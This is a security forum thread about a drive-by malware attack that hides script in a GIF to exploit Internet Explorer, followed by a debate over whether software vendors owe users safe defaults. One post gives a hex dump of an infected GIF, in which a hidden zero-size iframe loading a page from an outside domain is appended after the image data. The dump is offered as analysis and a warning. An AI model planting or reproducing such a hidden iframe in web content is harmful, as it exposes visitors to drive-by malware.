IE Driveby Malware Attack: Beware those GIFs!

Sad part is that the vuln was reported ages ago...

Internet Explorer ‘feature’ causing drive-by malware attacks - ZDNet Zero Day Blog

Quote:

The attack, discovered at a compromised legitimate site, is using a modified GIF file to exploit the cross-site scripting feature/vulnerability.

Schouwenberg said he reported the vulnerability to Microsoft a long time ago, warning the company that JavaScript embedded into GIF files can be executed under certain circumstances. Microsoft disagreed and the issue was never patched.

Cross site scripting flaws (in web applications alone) are so prevalent that I'd go as far as to say... who gives a crap.

Meanwhile, in another article on that site, Window Snyder was shrugging off multiple flaws that allowed full-on remote code execution in Firefox.

Perhaps we are starting to expect too much in the way of security from applications?

An application is a tool that is designed to provide functionality. The greater that functionality the greater the scope for misuse and abuse.

Whilst it is reasonable to expect due diligence from the development community, i feel that we are drifting into an "it wasn't me it was the cat wot done it" mentality.

Just look at commercially available security applications? Sniffers, keyloggers, password crackers and the like. Has anybody demanded "safe" versions of these?

I was in a local hardware store the other day, you know what? I didn't see a single "safe hammer", "safe chisel" or "safe screwdriver".

I would suggest that the only reasonable expectation of a tool is that it is capable of safely performing its basic functionality. Anything else and it is up to the user.

:)

Code:

rcgreen@blue:~/Desktop$ hexcat oa_main.gif 00000000 - 47 49 46 38 39 61 a1 00 19 00 c4 00 00 35 35 58 GIF89a....�..55X 00000010 - 28 28 53 1a 1a 36 23 23 4a c1 19 1c 29 29 53 21 ((S..6##J�..))S! 00000020 - 21 44 86 1a 27 53 1a 2e 29 29 4c 2c 2c 55 61 24 !D..'S..))L,,Ua$ 00000030 - 3a 5a 20 35 26 26 51 ee 18 15 d6 19 19 8e 21 2f :Z 5&&Q...�...!/ 00000040 - 72 1c 2c c2 1a 20 2d 2d 50 3b 3b 5f 1e 1e 3f b3 r.,�. --P;;_..?� 00000050 - 1a 1f 2f 2f 57 26 26 45 40 40 63 3c 23 3d a4 1a ..//W&&E@@c<#=.. 00000060 - 22 27 27 52 fd 18 13 25 25 4e 2e 1d 39 21 f9 04 "''R�..%%N..9!.. 00000070 - 00 00 00 00 00 2c 00 00 00 00 a1 00 19 00 00 05 .....,.......... 00000080 - ff 60 26 8e 19 65 9e 68 aa ae 29 e0 be 30 7c b9 .`&..e.h.�).�0|� 00000090 - 57 6d df 37 50 eb b4 8e ff 3f 85 70 48 1c 16 14 Wm�7P.�..?.pH... 000000a0 - 85 a4 72 c9 4c 06 02 9c 27 94 43 ad 46 a5 58 2c ..r�L...'.C.F.X, 000000b0 - d3 33 e8 7a bf e0 f0 d7 43 2e 37 ce 65 ae 78 cd �3.z�..�C.7�e�x 000000c0 - 0e a7 cf f0 b8 7c 4e af db ef 78 b8 75 6f cd 06 ..�.�|N��.x�uo�. 000000d0 - 4a 14 31 82 83 82 81 00 28 82 40 36 13 8c 8d 13 J.1.....(.@6.... 000000e0 - 09 8f 8c 09 93 8e 13 8a 33 97 35 45 9b 9b 4d 9e ........3.5E..M. 000000f0 - 4c 52 51 7c 7d 7e 59 9f 0c 12 a9 aa ab 12 08 15 LRQ|}~Y......... 00000100 - 10 a9 11 15 06 b4 06 b0 12 0c 5e 69 64 5d 1f aa .....�.�..^id].. 00000110 - 11 b5 b4 aa 06 08 ac ac 10 15 15 a9 10 ba 64 79 .��..........�dy 00000120 - cf d0 d1 78 a3 7b a5 4f 10 1d d9 da db 1d 10 09 ��x.{.O..��... 00000130 - 12 da 10 8e e0 1d 0b 33 89 35 d8 d9 0f 93 94 da .�.....3.5��... 00000140 - 18 0b dc f2 18 18 d9 12 90 13 42 41 37 fa 9c 9c ..��..�...BA7... 00000150 - 47 9f 3e 05 28 30 10 ca 13 6a 55 ac 69 09 78 20 G.>.(0.�.jU.i.x 00000160 - 1b 81 03 10 21 12 c8 76 40 c0 44 6d ae 92 5d 64 ....!.�v@�Dm�.]d 00000170 - 30 cb 40 18 03 1f 1c 6c 93 95 ac 82 b6 0a 08 d6 0�@....l....�.. 00000180 - ff 45 84 a8 4d 80 c9 0e 12 66 75 31 23 ad a6 cd .E..M.�..fu1#.. 00000190 - 3b 08 13 2a 0c a0 ce 1b 3d 0c 09 7a 62 20 97 cd ;..*..�.=..zb . 000001a0 - 01 03 7a e4 16 e0 63 54 43 92 ba 07 eb 7e d6 cb ..z...cTC.�..~� 000001b0 - 66 80 81 c3 92 c9 4e be 94 00 14 9f 3f 05 17 be f..�.�N�....?..� 000001c0 - 12 09 48 96 20 96 9c a4 76 0e 24 1b a0 61 87 8a ..H. ...v.$..a.. 000001d0 - 02 e2 0a 70 5b f1 22 d4 0e 0e 10 58 cc 96 b1 63 ...p[."�...X�.�c 000001e0 - ad 0a 21 b3 7d b8 1b 41 6e cb 94 1d 08 c8 8d db ..!�}�.An�...�. 000001f0 - 52 c0 55 5a 33 3d dc 9c 3c 19 ed 15 b5 3c b3 41 R�UZ3=�.<...�<�A 00000200 - 90 8a 41 dd 81 0a 17 23 dc 7d f0 61 a3 86 05 a8 ..A�...#�}.a.... 00000210 - 51 6b 98 a4 2e 66 84 75 25 0f 3b 8c 40 a0 f6 c5 Qk...f.u%.;.@.. 00000220 - 0e 2e ed 19 e8 7a 44 ec 3f 24 6c 95 14 94 52 e0 .....zD.?$l...R. 00000230 - 8a 65 9d 3b cb 62 a1 bb 78 2e c5 bd 1d f4 8e be .e.;�b.�x.Ž...� 00000240 - 8b c0 ad b6 cf 15 a8 c7 d5 ee 38 9b 00 c4 0f e5 .�.��..��.8..�.. 00000250 - e1 16 20 92 40 32 8f 03 9c 51 5e ff cc 32 66 2c .. [email protected]^.�2f, 00000260 - 42 a5 d2 05 9d 8d a3 06 91 db 18 58 d7 8c e1 b5 B.�......�.X�..� 00000270 - c3 da 77 99 f7 12 6e e0 0d 76 dd 01 85 ed 25 c1 ��w...n..v�...% 00000280 - ff 6e 1e 24 90 84 6f 42 94 15 d0 59 07 1d 87 9c .n.$..oB..�Y.... 00000290 - 42 02 99 95 05 73 8b 31 77 91 5e df e1 c7 57 5c B....s.1w.^�.�W\ 000002a0 - 58 25 73 97 78 d1 75 47 a0 43 db ad b3 58 04 07 X%s.x�uG.C�.�X.. 000002b0 - b8 02 59 7a 92 b1 67 23 1d ee bd 47 9c 3a 28 be �.Yz.�g#..�G.:(� 000002c0 - a5 4c 7d 1d f9 57 df 6e f4 4c d2 9f 4a 2b 59 70 .L}..W�n.L�.J+Yp 000002d0 - d5 49 e0 b9 f4 c1 06 45 65 a4 5b 7a 0d 44 f1 20 �I.�.�.Ee.[z.D. 000002e0 - 70 00 49 d8 c4 13 c2 89 62 61 5a c9 79 62 8d 12 p.I��.�.baZ�yb.. 000002f0 - fb 89 57 d7 88 72 09 d9 17 56 84 35 f7 01 46 b2 ..W�.r.�.V.5..F� 00000300 - 25 b6 18 94 78 c9 a2 1b 7a 34 dd 78 63 8e 3a ae %�..x�..z4�xc.:� 00000310 - 95 c4 04 a9 05 8a 1a 03 47 61 c0 80 6a 9c 11 ba .�......Ga�.j..� 00000320 - 80 06 45 b6 93 40 6a 18 04 43 0b 02 84 6a 40 28 ..E�[email protected]@( 00000330 - 03 20 11 8a 80 a4 97 6e 7a 29 8d 0d 68 09 ca 12 . .....nz)..h.�. 00000340 - 1c 98 f5 25 9f 18 fa e9 04 86 4b 0c 40 4b 89 b0 ...%......K.@K.� 00000350 - c6 0a ab a4 92 ca 6a eb ad 7e a1 47 63 8d 7a b2 �....�j..~.Gc.z� 00000360 - 87 ea 7b 4d 48 e2 68 3b 5d 0d 6b ec b1 8f 18 eb ..{MH.h;].k.�... 00000370 - 01 67 52 0d 80 41 1b cf 36 e3 0c 15 04 09 b7 a5 .gR..A.�6.....�. 00000380 - d3 29 15 1a 77 2a 42 98 39 a1 61 98 4c 7c 41 6b �)..w*B.9.a.L|Ak 00000390 - 30 6d 94 db c6 b8 ba 9a 1b 99 7a bd 56 f6 ab 5a 0m.�Ƹ�...z�V..Z 000003a0 - 01 69 e2 c8 52 13 14 c0 c8 11 8c fc e6 8f 27 0e .i.�R..��.. 000003b0 - 4e d2 40 3b 67 00 cc 41 03 35 f2 7a 06 15 c4 79 N�@;g.�A.5�z..�y 000003c0 - ab 44 a9 03 31 ec 25 c2 db e6 a4 96 95 c4 c1 1b .D..1.%��....��. 000003d0 - 50 1a 6c ec a2 f1 c6 1c 77 ec f1 c7 79 b6 6b d3 P.l...�.w..�y�k 000003e0 - bb 16 c7 0b 56 58 fe a0 0c e1 3f 4b 44 b8 c4 5a �.�.VX....?KD��Z 000003f0 - 5c c2 1c f3 14 d5 d2 bc 6a c3 09 1b 14 f1 a9 3b \�.�.�Ҽj�.....; 00000400 - 51 7b b3 16 7e 48 28 c7 c6 22 17 6d 74 4d 24 83 Q{�.~H(��".mtM$. 00000410 - 4b 16 3f 61 a9 bc 72 6f 2e 8f 05 1c 96 a2 56 6b K.?a.�ro......Vk 00000420 - b5 d5 36 27 04 f1 ce 11 fb a1 f5 65 3a 8a 7a f4 ��6'..�....e:.z. 00000430 - d8 64 23 9d f4 98 55 17 e1 b4 58 bd 3d e8 76 d5 �d#...U..�X�=.v 00000440 - 2f 5f 5b ca c3 53 4c 51 0d d7 96 35 e0 75 28 60 /_[��SLQ.�.5.u(` 00000450 - 03 0b 77 08 00 3b 0d 0a 3c 69 66 72 61 6d 65 20 ..w..;..<iframe 00000460 - 73 72 63 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 67 src=http://www.g 00000470 - 6f 6c 64 77 69 6e 64 6f 73 32 30 30 30 2e 63 6f oldwindos2000.co 00000480 - 6d 2f 68 6b 65 72 61 6f 6e 65 2f 68 6b 65 72 2e m/hkeraone/hker. 00000490 - 68 74 6d 20 77 69 64 68 74 3d 30 20 68 65 69 67 htm widht=0 heig 000004a0 - 68 74 3d 30 3e 3c 2f 69 66 72 61 6d 65 3e ht=0></iframe> rcgreen@blue:~/Desktop$

It's on a site named grooveradio dot com. The usual cautions
apply. Don't view it with Internet Explorer.
:cool: